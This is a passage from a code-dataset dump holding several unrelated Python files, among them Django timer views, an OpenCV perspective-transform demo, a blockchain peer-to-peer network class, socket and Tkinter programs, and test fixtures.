","sub_path":"题目分类/双指针/merge_sorted_array_88.py","file_name":"merge_sorted_array_88.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484095747","text":"# Django imports\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n# Other imports\nimport sqlite3\nfrom datetime import datetime, timedelta, time\nimport calendar\n# My imports\nfrom .forms import TimerForm\nfrom .models import Timer\n\n@login_required\ndef show(request, user_id):\n \"\"\"Shows the timer template with form to be saved in db after measuring.\"\"\"\n user = User.objects.get(id=user_id)\n if request.user != user:\n raise Http404\n else:\n if request.method != 'POST':\n form = TimerForm()\n else:\n form = TimerForm(data=request.POST)\n new_score = form.save(commit=False)\n new_score.user = user # assigning the user_id to the result\n new_score.save()\n return HttpResponseRedirect(reverse('users:profile', args=[user_id]))\n return render(request, 'timer/show.html', {'form' : form, 'user' : user})\n\n@login_required\ndef all(request, user_id):\n \"\"\"Showing the overall statement assigned to the user who is checking it.\"\"\"\n user = User.objects.get(id=user_id)\n if request.user != user:\n raise Http404\n else:\n timers = Timer.objects.filter(user_id=user_id) # Shows all scores of user.\n data = data_dict(timers) # My function that sums all scores into hours.\n name = \"Overall statement\" # Heading displayed in the template.\n\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef today(request, user_id):\n \"\"\"Showing today's statement for the user.\"\"\"\n today_filter = datetime.now().date() # Current date.\n # name - Heading displayed in the template.\n name = datetime.now().date().strftime(\"%B %d\")\n # timers - Scores filtered by current date and user id.\n timers = Timer.objects.filter(date__date=today_filter, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef yesterday(request, user_id):\n \"\"\"Showing yesterday's statement for the user.\"\"\"\n today = datetime.now().date() # Current date.\n yesterday = today - timedelta(days=1)\n name = yesterday.strftime(\"%B %d\") # Heading displayed in the template.\n\n # timers - Scores filtered by yesterday's date and user id.\n timers = Timer.objects.filter(date__date=yesterday, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours, using my function.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef two_days(request, user_id):\n \"\"\"Showing the statement from two days ago for the user.\"\"\"\n today = datetime.now().date()\n two_days = today - timedelta(days=2)\n name = two_days.strftime(\"%B %d\")\n\n # timers - Scores filtered by the date two days ago and user id.\n timers = Timer.objects.filter(date__date=two_days, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef three_days(request, user_id):\n \"\"\"Showing the statement from three days ago for the user. Same logic as above.\"\"\"\n today = datetime.now().date()\n three_days = today - timedelta(days=3)\n name = three_days.strftime(\"%B %d\")\n\n timers = Timer.objects.filter(date__date=three_days, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef week(request, user_id):\n \"\"\"Showing the whole previous week's statement for the user.\"\"\"\n today = datetime.now()\n week_number = int(today.strftime(\"%W\")) - 1 # Acquiring previous week number\n d = \"2017-W{}\".format(week_number) # Date format to get week date.\n\n
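 # Added note (not in the original view): \"%Y-W%W-%w\" parses \"year-Wweek-weekday\",\n # e.g. datetime.strptime(\"2017-W20-1\", \"%Y-W%W-%w\") is the Monday of week 20;\n # \"-0\" picks the Sunday. The year is hardcoded to 2017 here.\n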
 # week_last - last day of the chosen week (month, day); week_first - its first day.\n week_last = datetime.strptime(d + \"-0\", \"%Y-W%W-%w\").date().strftime(\"%B %d\")\n week_first = datetime.strptime(d + \"-1\", \"%Y-W%W-%w\").date().strftime(\"%B %d\")\n\n name = \"{} - {}\".format(week_first, week_last)\n timers = Timer.objects.filter(date__week=week_number, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef month(request, user_id):\n \"\"\"Showing the whole previous month's statement for the user.\"\"\"\n today = datetime.now()\n month_number = int(today.strftime(\"%m\")) - 1 # Acquiring previous month no.\n\n # name - heading displayed in the template generated using calendar module.\n name = calendar.month_name[month_number]\n timers = Timer.objects.filter(date__month=month_number, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\ndef data_dict(timers):\n \"\"\"Build the data dictionary used as data for the charts. It sums all\n minutes and hours from the db into rounded hours.\"\"\"\n data = {}\n for timer in timers: # Iterating through all the results.\n # Converts minutes to hours, rounded to four decimal places.\n hours = [round((timer.minutes / 60), 4) + timer.hours]\n if not timer.activity in data: # If activity name not in data dict,\n data[timer.activity] = hours # add it with value of hours.\n else: # If it is in data, append its values into the list.\n data[timer.activity].append(float(sum(hours)))\n\n# Every key has its own list of values now, and these lists need to be summed.\n for key, value in data.items():\n data[key] = sum(data[key]) # Sum the lists of values.\n return data\n","sub_path":"timer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"22639077","text":"'''\ncv2.getPerspectiveTransform(src, # source points as an array of image coordinates\n dst) # destination points as an array of image coordinates\n\ncv2.warpPerspective(src, input image\n M, transform matrix\n dsize, size of the output image after the transform\n dst=None, output image, None by default\n flags=None, interpolation method\n borderMode=None, border pixel extrapolation mode\n borderValue=None) border pixel fill value, 0 by default\n'''\n\n\nimport numpy as np\nimport cv2\n\nimg=cv2.imread('photo1.jpg')\nimg1=img.copy()\n\nsrc = np.float32([[207, 151], [517, 285], [17, 601], [343, 731]])\ndst = np.float32([[0, 0], [337, 0], [0, 488], [337, 488]])\n\nprint(img.shape)\n\n# Build the perspective transform matrix, then apply the perspective transform\nmt=cv2.getPerspectiveTransform(src,dst)\n\nprint('perspective transform matrix:')\nprint(mt)\n# Apply the perspective transform\nresult=cv2.warpPerspective(img1,# image to transform\n mt,# transform matrix\n (338,488))# output image size\n\ncv2.imshow('original image:',img)\ncv2.imshow('transformed image:',result)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"64-徐鹏-安徽/week04/perspective_transform.py","file_name":"perspective_transform.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"397754477","text":"import pytest\nimport pathlib\n\nfrom osp_pipeline.catalog.models.crossref import CrossrefRecord\nfrom osp_pipeline.catalog.models.viaf import VIAFCluster\nfrom osp_pipeline.catalog.models.marc import LOCRecord, OTLRecord\n\nfrom osp_pipeline.catalog import 
data_path\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef loc(sc, spark):\n \"\"\"Build normalized LOC dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'loc_fixtures')\n df = LOCRecord.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef viaf_clusters(sc, spark):\n \"\"\"Build normalized VIAF Works dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'viaf_fixtures')\n df = VIAFCluster.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef otl(sc, spark):\n \"\"\"Build normalized OTL dataframe\"\"\"\n p = str(data_path('otl'))\n df = OTLRecord.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef crossref(sc, spark):\n \"\"\"Load & cache Crossref dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'crossref_fixtures')\n df = CrossrefRecord.from_files(p)\n df.cache()\n yield df\n df.unpersist()\n","sub_path":"tests/osp_pipeline/catalog/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271318124","text":"\"\"\"\n- This program runs the code for increasing number of addiction levels and records the runtime\n- Make sure to change \"output_file\" & \"stochastic\" variable to switch between deterministic & stochastic\n\"\"\"\n\nimport json\nimport subprocess\nimport datetime\nimport pandas as pd\nimport os\nimport csv\n\nparam_file = \"./data/run_parameters.json\"\nfname = './data/stock_counts.csv'\noutput_file = \"./outputs/timings/stochastic_addiction.csv\"\nstochastic = 1\n\nfor addiction in [4,5,10,20,30,40,50]:\n \n print('*****')\n print(\"Running Simulation for addiction: \" + str(addiction))\n print('*****')\n\n # open the run_parameters file\n with open(param_file, 'r') as f:\n params = json.load(f)\n \n # adjust years\n params['years'] = 1\n params['num_foi'] = 10\n params['stochastic'] = stochastic\n params['sruns'] = 10\n\n # save adjusted parameters file\n with open(param_file, 'w') as f:\n json.dump(params, f)\n\n # open the stock count file and adjust\n with open(fname) as inf:\n reader = csv.reader(inf.readlines())\n \n lines = list(reader)\n # set number of age groups\n lines[-1][1] = str(3)\n # set number of addiction levels\n lines[-2][1] = str(addiction)\n\n with open(fname, 'w') as outf:\n writer = csv.writer(outf)\n for line in lines:\n writer.writerow(line)\n \n # run simulation\n start = datetime.datetime.now()\n subprocess.call([\"python3\",\"system_dynamics.py\",\"./data/run_parameters.json\"], shell=False)\n seconds = (datetime.datetime.now() - start).total_seconds()\n\n # Save time to file\n if os.path.isfile(output_file):\n pd.DataFrame({'addiction' : [addiction], 'time': [seconds]}).to_csv(output_file, index=False,mode='a',header=False)\n else:\n pd.DataFrame({'addiction' : [addiction], 'time': [seconds]}).to_csv(output_file, index=False)\n\n","sub_path":"run_scale_addiction.py","file_name":"run_scale_addiction.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"218552271","text":"from flaskblog import db\n\n\nclass Articles(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n crypto_name = db.Column(db.String(20), nullable=False)\n header = db.Column(db.Text, nullable=False)\n paragraph = db.Column(db.Text, nullable=False)\n\n def __init__(self, crypto_name, 
header, paragraph):\n self.crypto_name = crypto_name\n self.header = header\n self.paragraph = paragraph\n\n","sub_path":"flaskblog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"402601443","text":"# noinspection PyPep8Naming\nimport array\nimport base64\nimport inspect\nimport socket\nimport threading\nimport traceback\nfrom json import JSONDecodeError\n\nimport time\n\nimport sys\n\nfrom energyblockchain.blockchain.Block import Block\nfrom energyblockchain.network.Message import *\nfrom energyblockchain.blockchain.transaction.Transaction import *\n\n\nclass ChainNetwork:\n PROTOCOL_VER = 1\n\n def __init__(self, pubkey: str, clientname: str, bootstrapIP: str, blockchain):\n \"\"\"\n :type blockchain: Blockchain\n \"\"\"\n self.blockchain = blockchain\n self.pubkey = pubkey\n self.clientname = clientname\n self.connections = list()\n self.connectionlocks = dict()\n self.seen_messages = list()\n\n self.kill = False\n\n self._pending_updates = list()\n self._update_condition = threading.Condition()\n self._update_thread = threading.Thread(target=self._update_thread_func)\n self._update_thread.start()\n\n # Fetch own IP\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n self.ip = s.getsockname()[0]\n s.close()\n\n if bootstrapIP is not None:\n try:\n client = socket.socket()\n client.settimeout(3)\n client.connect((bootstrapIP, 12345))\n thread = threading.Thread(target=self._accept_connection, args=(client, bootstrapIP)) # Start new thread\n thread.start()\n time.sleep(2)\n self.send_message(ID(PUBKEY=pubkey, PROTOCOL_VER=ChainNetwork.PROTOCOL_VER, CLIENT_NAME=clientname), client)\n except IOError as e:\n print(e)\n\n serverthread = threading.Thread(target=self._start_server)\n serverthread.start()\n\n def _update_thread_func(self):\n while not self.kill:\n if len(self._pending_updates) == 0: # If no pending tasks\n with self._update_condition: # Acquire lock on condition\n self._update_condition.wait(timeout=3.0) # Wait until new task is added and update thread is notified\n else:\n for update in self._pending_updates:\n # noinspection PyBroadException\n try:\n if update(): # Call update; if update returns true, remove from pending list\n self._pending_updates.remove(update)\n except BaseException as e:\n print(\"STATE UPDATES SHOULD NOT RAISE EXCEPTIONS!\")\n traceback.print_exc()\n sys.exit(-1)\n\n def add_update(self, update):\n if update is not None:\n self._pending_updates.append(update) # Add update to list of updates\n with self._update_condition: # Acquire lock condition\n self._update_condition.notify() # Notify update thread of new update\n\n def _accept_connection(self, connection, address):\n try:\n connection.settimeout(3.0)\n self._add_connection(connection)\n datalist = [] # Cache for incomplete messages\n while not self.kill:\n try:\n data = connection.recv(1024)\n if (not data) and len(data) > 0: # At End of Stream, try to parse remaining cache\n self.add_update(self.try_parse(datalist, connection))\n break\n for b in data:\n if b == 30: # Check if byte is record-separator; codepoint and byte are identical for ASCII characters\n self.add_update(self.try_parse(datalist, connection))\n datalist.clear()\n else:\n datalist.append(b)\n except socket.timeout:\n pass\n except BaseException as e:\n print(type(e))\n print(e)\n raise e\n else:\n self._del_connection(connection)\n connection.close()\n\n def 
_start_server(self):\n try:\n server = socket.socket()\n server.bind((self.ip, 12345))\n server.listen(0)\n server.settimeout(3.0)\n while not self.kill:\n try:\n conn, addr = server.accept()\n thread = threading.Thread(target=self._accept_connection, args=(conn, addr)) # Start new thread\n thread.start()\n except socket.timeout:\n pass\n except IOError as e:\n print(type(e))\n print(e)\n except IOError as e:\n print(type(e))\n print(e)\n\n def try_parse(self, datalist: list, connection):\n try:\n string = array.array('B', datalist).tobytes().decode('utf-8')\n print(\"Received: '\" + string + \"'\")\n inputjson = json.loads(string, encoding='utf-8')\n if type(inputjson) is dict:\n # Parse received message to message object class\n assert isinstance(inputjson['REQUEST'], str)\n clazz = globals()[inputjson['REQUEST']] # TODO: _REALLY_ NEEDS INPUT SANITATION\n if inspect.isclass(clazz):\n del inputjson['REQUEST']\n message = clazz(**inputjson)\n if not isinstance(message, MESSAGE):\n # Something has gone terribly wrong\n pass\n if message.MESSAGE_ID not in self.seen_messages:\n self.seen_messages.append(message.MESSAGE_ID)\n if len(self.seen_messages) > 50:\n self.seen_messages.pop(0)\n if message.is_broadcasted():\n print(\"BROADCASTING: \" + str(message))\n self.send_message(message, None)\n if message.REQUEST == 'ID': # No jump tables in python >.>\n # Not operator used to turn None return type into True to indicate success\n return lambda: not self.send_message(\n ID_ACK(PUBKEY=self.pubkey, PROTOCOL_VER=ChainNetwork.PROTOCOL_VER, CLIENT_NAME=self.clientname), connection)\n elif message.REQUEST == 'ID_ACK':\n # Uses or operator to combine both expressions into a single expression; send_message always returns None\n return lambda: not (self.send_message(ADDR(IP=self.ip, PUBKEY=self.pubkey), connection) or\n self.send_message(GETINV(BLOCK_HASH=self.blockchain.manifest.head, PUBKEY=self.pubkey), connection))\n elif message.REQUEST == \"INV\":\n assert isinstance(message, INV)\n return lambda: not self.blockchain.load_hashes(message.BLOCK_HASHES, message.TX_HASHES)\n elif message.REQUEST == \"GETINV\":\n assert isinstance(message, GETINV)\n with self.blockchain.mutex:\n missed_hashes = list()\n current_hash = self.blockchain.manifest.head\n while current_hash != message.BLOCK_HASH and current_hash != \"ROOT\":\n missed_hashes.append(current_hash)\n current_hash = self.blockchain.manifest.blocks[current_hash]\n return lambda: not self.send_message(\n INV(BLOCK_HASHES=missed_hashes, TX_HASHES=self.blockchain.manifest.transactions, PUBKEY=self.pubkey), connection)\n elif message.REQUEST == \"GETBLOCK\":\n assert isinstance(message, GETBLOCK)\n with self.blockchain.mutex:\n block = self.blockchain.load_block(message.BLOCK_HASH)\n b64 = base64.b64encode(block.block_bytes()).decode(\"utf-8\")\n return lambda: not self.send_message(BLOCK(BLOCK_HASH=block.block_hash(), BLOCK_CONTENT=b64, PUBKEY=self.pubkey),\n connection)\n elif message.REQUEST == \"BLOCK\":\n assert isinstance(message, BLOCK)\n return lambda: self.blockchain.import_block(Block(**json.loads(base64.b64decode(message.BLOCK_CONTENT).decode('utf-8'))))\n elif message.REQUEST == \"GETTRANSACTION\":\n assert isinstance(message, GETTRANSACTION)\n with self.blockchain.mutex:\n tx = self.blockchain.load_tx(message.TX_HASH)\n if tx:\n return lambda: not self.send_message(TRANSACTION(tx.tx_hash(), tx.to_b64(), self.pubkey), connection)\n else:\n return None\n elif message.REQUEST == \"TRANSACTION\":\n assert isinstance(message, TRANSACTION)\n 
dec = base64.b64decode(message.TX_CONTENT)\n tx_dict = json.loads(dec.decode('utf-8'))\n clazz = globals()[tx_dict[\"class\"]] # TODO: Really needs sanitation\n del tx_dict[\"class\"]\n tx = clazz(**tx_dict)\n return lambda: not self.blockchain.import_tx(tx)\n else:\n print('Request: ' + message.REQUEST)\n pass\n else:\n print('No such class: ' + inputjson['REQUEST'])\n pass\n else:\n print('Input json is not dict! ' + str(inputjson))\n except JSONDecodeError as e:\n # Invalid json\n print(e)\n\n def _add_connection(self, connection):\n self.connections.append(connection)\n self.connectionlocks[connection] = threading.Lock()\n\n def _del_connection(self, connection):\n with self.connectionlocks[connection]:\n self.connectionlocks[connection] = None\n self.connections.remove(connection)\n\n def send_message(self, message: MESSAGE, connection):\n \"\"\"\n Sends a message to the specified connection, or broadcasts it\n :param message: Message to send\n :param connection: Connection to send to, or if None, broadcast the message\n \"\"\"\n if connection is not None:\n print('Sending: ' + str(message.to_bytes()))\n with self.connectionlocks[connection]:\n connection.send(message.to_bytes())\n else:\n print('Broadcasting: ' + str(message.to_bytes()))\n for connection in self.connections:\n with self.connectionlocks[connection]:\n print(connection)\n connection.send(message.to_bytes())\n\n def close(self):\n self.kill = True\n pass\n","sub_path":"energyblockchain/network/ChainNetwork.py","file_name":"ChainNetwork.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556353965","text":"import socket\nimport threading\nimport signal\n\n\nIS_EXIT = False\nthrs = []\n\n\ndef signal_handler(signal, frame):\n print('You pressed Ctrl+C!')\n global IS_EXIT\n IS_EXIT = True\n\n\ndef serveclient(s_client, n):\n s_client.send(b'hello')\n data = s_client.recv(1024)\n if data:\n print(f\"client{n} sent: {data}\")\n s_client.send(b'bye')\n s_client.close()\n\n\nsignal.signal(signal.SIGINT, signal_handler)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('127.0.0.1', 9999))\ns.listen(5)\ns.settimeout(1)\nn = 0\nprint('MT server is working ...')\nwhile True:\n try:\n s_client, addr_client = s.accept()\n n = n+1\n t = threading.Thread(target=serveclient,\n args=(s_client, n))\n t.start()\n thrs.append(t)\n except socket.timeout:\n if IS_EXIT:\n for t in thrs:\n t.join()\n print('all threads are finished')\n s.close()\n break\n\n
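# Added sketch (not in the original script): a minimal client for this server.\n# It reads the greeting, sends one message, then reads the goodbye.\n#\n# c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# c.connect(('127.0.0.1', 9999))\n# print(c.recv(1024)) # b'hello'\n# c.send(b'ping')\n# print(c.recv(1024)) # b'bye'\n# c.close()\n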
ou \\'Q\\' para sair ')\n if operacao == 'Q' or operacao == 'q':\n break\n\n elif operacao == '+' or operacao == '-' or operacao == '*' or operacao == '/': \n # Perguntar o primeiro numero\n x = int(input('Digite o primeiro numero: '))\n\n # Perguntar o segundo numero\n y = int(input('Digite o segundo numero: '))\n\n # Calculo desses 2 numeros\n if operacao == '+':\n result = x + y\n\n elif operacao == '-':\n result = x - y\n\n elif operacao == '*':\n result = x * y\n\n elif operacao == '/':\n result = x / y\n\n else:\n print('Operação Invalida')\n\n # Imprimir o resultado na tela\n print(result)\n \n input('PRESS ENTER')\n os.system('clear')\n \n else:\n print('Operação Invalida')\n input('PRESS ENTER')\n os.system('clear')","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"612310385","text":"from tkinter import Frame, messagebox, Button, IntVar, Menu\n\nimport view.window\nimport view.newsFeed\nimport view.queue\nimport view.clientButton\nimport view.statisticWindow\n\nimport logic.case\nimport logic.client\n\nimport random\n\n\nclass MainWindow(Frame):\n def __init__(self, root, n_case: int = 6, n_window: int = 6, **kw):\n super().__init__(root, **kw)\n\n self._master_frame = Frame(self.master)\n self._master_frame.grid(row=0, column=0, sticky='nwes')\n\n self._stats_view = False\n self._case_list = []\n self._window_list = []\n self._queue_list = []\n self._count_variable_list = []\n\n self._MAX_QUEUE_SIZE = 10\n self._MAX_CASE_NUMBER = 6\n self._MAX_WINDOW_NUMBER = 6\n self._news_feed = None\n\n top_section = Frame(self._master_frame, height=350)\n top_section.pack_propagate(False)\n bottom_section = Frame(self._master_frame, height=240)\n bottom_section.pack_propagate(False)\n\n top_section.pack(fill='x', padx=20, pady=20)\n bottom_section.pack(fill='both', padx=20, pady=20)\n\n self._queue_frame = Frame(bottom_section)\n self._client_frame = Frame(top_section, padx=20, pady=20)\n self._window_frame = Frame(top_section)\n\n self.init_news_feed_section(bottom_section)\n self.init_case(n_case)\n self.init_window(n_window)\n\n self._window_frame.pack(side='left')\n self._queue_frame.pack(side='left', expand='false', fill='both', anchor='w')\n self._client_frame.pack(anchor='e')\n self.init_menubar()\n\n def init_case(self, n_case):\n for i in range(n_case):\n self.add_case()\n\n def init_window(self, n_window):\n for i in range(n_window):\n self.add_window()\n\n def add_window(self):\n if len(self._window_list) < self._MAX_WINDOW_NUMBER:\n frame = Frame(self._window_frame)\n w = view.window.Window(frame, self._case_list, 'okienko ' + str(len(self._window_list)), self._news_feed)\n self._window_list.append(w)\n frame.bind('<>', self.sh_next_client)\n frame.pack(side='left')\n\n def remove_window(self):\n if len(self._window_list) > 1:\n self._window_frame.winfo_children()[-1].destroy()\n self._window_list.pop()\n\n def add_client(self):\n row = Frame(self._client_frame)\n b = view.clientButton.ClientButton(row, self._case_list[-1])\n b.connect_count_variable(self._count_variable_list[-1])\n row.bind(\"<>\", self.sh_add_client)\n row.pack()\n\n def remove_client(self):\n self._client_frame.winfo_children()[-1].destroy()\n\n def add_queue(self):\n row1 = Frame(self._queue_frame)\n row2 = Frame(self._queue_frame)\n client_type = logic.client.ClientType\n\n case = self._case_list[len(self._queue_list)]\n normal = view.queue.Queue(row1, case, 
client_type.NORMAL, self._MAX_QUEUE_SIZE, str(case.id))\n vip = view.queue.Queue(row2, case, client_type.VIP, self._MAX_QUEUE_SIZE, str(case.id) + ' VIP')\n\n v = IntVar()\n self.connect_variable_to_queue(normal, v)\n self.connect_variable_to_queue(vip, v)\n self._queue_list.append([normal, vip])\n self._count_variable_list.append(v)\n\n row1.pack()\n row2.pack()\n\n def remove_queue(self):\n self._queue_list.pop()\n self._count_variable_list.pop()\n self._queue_frame.winfo_children()[-1].destroy()\n self._queue_frame.winfo_children()[-1].destroy()\n\n def connect_variable_to_queue(self, queue, variable):\n queue.connect_news_feed(self._news_feed)\n queue.connect_count_variable(variable)\n\n def init_news_feed_section(self, master):\n frame = Frame(master)\n self._news_feed = view.newsFeed.NewsFeed(frame)\n frame.pack(side='left', expand='false', fill='y')\n\n def init_menubar(self):\n menubar = Menu(self._master_frame)\n self.master.config(menu=menubar)\n\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Zakończ', command=self.close)\n menubar.add_cascade(label='Plik', menu=filemenu)\n\n casemenu = Menu(menubar, tearoff=0)\n casemenu.add_command(label='Dodaj sprawę', command=self.add_case)\n casemenu.add_command(label='Usuń sprawę', command=self.remove_case)\n menubar.add_cascade(label='Sprawa', menu=casemenu)\n\n windowmenu = Menu(menubar, tearoff=0)\n windowmenu.add_command(label='Dodaj okno', command=self.add_window)\n windowmenu.add_command(label='Usuń okno', command=self.remove_window)\n menubar.add_cascade(label='Okienko', menu=windowmenu)\n\n statsmenu = Menu(menubar, tearoff=0)\n statsmenu.add_command(label='Pokaż statystyki', command=self.open_stats)\n statsmenu.add_command(label='Reset', command=self.reset)\n menubar.add_cascade(label='Statysyka', menu=statsmenu)\n\n def open_stats(self):\n if sum(sum(len(i) for i in j) for j in self._queue_list) > 0:\n messagebox.showinfo('Błąd', 'W kolejce są ludzie')\n else:\n self._stats_view = True\n view.statisticWindow.StatisticWindow(self.master, self._master_frame, self._window_list, self._case_list,\n self._stats_view)\n\n def reset(self):\n q = self._queue_list\n w = self._window_list\n\n for i in range(len(w)):\n w[i].reset()\n\n for i in range(len(q)):\n for j in range(len(q[i])):\n q[i][j].reset()\n\n self._news_feed.reset()\n\n if self._stats_view:\n self.open_stats()\n\n def check_window(self, client):\n for window in self._window_list:\n if window.available and window.check_client(client):\n window += client\n self._news_feed.add('Klient {} unika kolejki'.format(str(client)))\n break\n else:\n for q in self._queue_list:\n if q[client.client_type.value - 1].case.id == client.case.id:\n q[client.client_type.value - 1] += client\n # self._queue_list[client.case.id][client.client_type.value - 1] += client\n\n def sh_add_client(self, event):\n client = view.clientButton.ClientButton.new_client_list.pop(0)\n i = client.case.id\n j = client.client_type.value - 1\n ct = logic.client.ClientType\n\n for q in self._queue_list:\n if q[ct.VIP.value - 1].case.id == i:\n if len(q[ct.VIP.value - 1]) == 0 and len(q[ct.NORMAL.value - 1]) == 0:\n self.check_window(client)\n else:\n q[j] += client\n # if len(self._queue_list[i][ct.VIP.value - 1]) == 0 and len(self._queue_list[i][ct.NORMAL.value - 1]) == 0:\n # self.check_window(client)\n # else:\n # self._queue_list[i][j] += client\n\n def check_queue(self, window):\n ct = logic.client.ClientType\n\n if window.available:\n add_list = []\n\n for i in range(len(window.case_list)):\n 
if window.case_list[i].state and len(self._queue_list[i][ct.VIP.value - 1]) > 0:\n add_list.append((i, ct.VIP.value - 1))\n\n if len(add_list) == 0:\n for i in range(len(window.case_list)):\n if window.case_list[i].state and len(self._queue_list[i][ct.NORMAL.value - 1]) > 0:\n add_list.append((i, ct.NORMAL.value - 1))\n\n if len(add_list) > 0:\n q = random.choice(add_list)\n window += self._queue_list[q[0]][q[1]].pop()\n return self._queue_list[q[0]][q[1]]\n\n def sh_next_client(self, event):\n window_th = view.window.Window.waiting_windows.pop(0)\n queue_to_refresh = self.check_queue(window_th)\n\n if queue_to_refresh:\n message = 'Klient przechodzi z kolejki {} do okienka {}'.format(str(queue_to_refresh), str(window_th))\n self._news_feed.add(message)\n\n def add_case(self):\n if len(self._case_list) < self._MAX_CASE_NUMBER:\n case = logic.case.Case('sprawa ' + str(len(self._case_list)))\n self._case_list.append(case)\n self.add_queue()\n self.add_client()\n\n for window in self._window_list:\n window.update_case_bulb()\n\n def remove_case(self):\n if len(self._case_list) > 1:\n self._case_list.pop()\n self.remove_queue()\n self.remove_client()\n\n for window in self._window_list:\n window.update_case_bulb()\n\n def close(self):\n self.master.destroy()\n","sub_path":"view/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"515427181","text":"from django.urls import path, include\n\nfrom .views import login_user, register, logout_user\n\nurlpatterns = [\n path('', include('profiles.urls')),\n path('login/', login_user, name='login'),\n path('register/', register, name='register'),\n path('logout/', logout_user, name='logout_user'),\n\n]\n","sub_path":"quiz_project/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"57847367","text":"from random import randint\n\nfrom basetestcase import BaseTestCase\nfrom couchbase_helper.documentgenerator import doc_generator\nfrom couchbase_helper.durability_helper import DurabilityHelper\nfrom membase.api.rest_client import RestConnection\n\n\nclass DurabilityTestsBase(BaseTestCase):\n def setUp(self):\n super(DurabilityTestsBase, self).setUp()\n\n self.key = 'test_docs'.rjust(self.key_size, '0')\n self.simulate_error = self.input.param(\"simulate_error\", None)\n self.error_type = self.input.param(\"error_type\", \"memory\")\n self.doc_ops = self.input.param(\"doc_ops\", None)\n self.with_non_sync_writes = self.input.param(\"with_non_sync_writes\",\n False)\n self.skip_init_load = self.input.param(\"skip_init_load\", False)\n self.crud_batch_size = 100\n self.num_nodes_affected = 1\n if self.num_replicas > 1:\n self.num_nodes_affected = 2\n\n if self.doc_ops:\n self.doc_ops = self.doc_ops.split(';')\n\n self.durability_helper = DurabilityHelper(\n self.log, len(self.cluster.nodes_in_cluster),\n self.durability_level)\n\n # Initialize cluster using given nodes\n nodes_init = self.cluster.servers[1:self.nodes_init] \\\n if self.nodes_init != 1 else []\n self.task.rebalance([self.cluster.master], nodes_init, [])\n self.cluster.nodes_in_cluster.extend([self.cluster.master]+nodes_init)\n\n # Disable auto-failover to avoid failover of nodes\n status = RestConnection(self.cluster.master) \\\n .update_autofailover_settings(False, 120, False)\n self.assertTrue(status, msg=\"Failure during disabling 
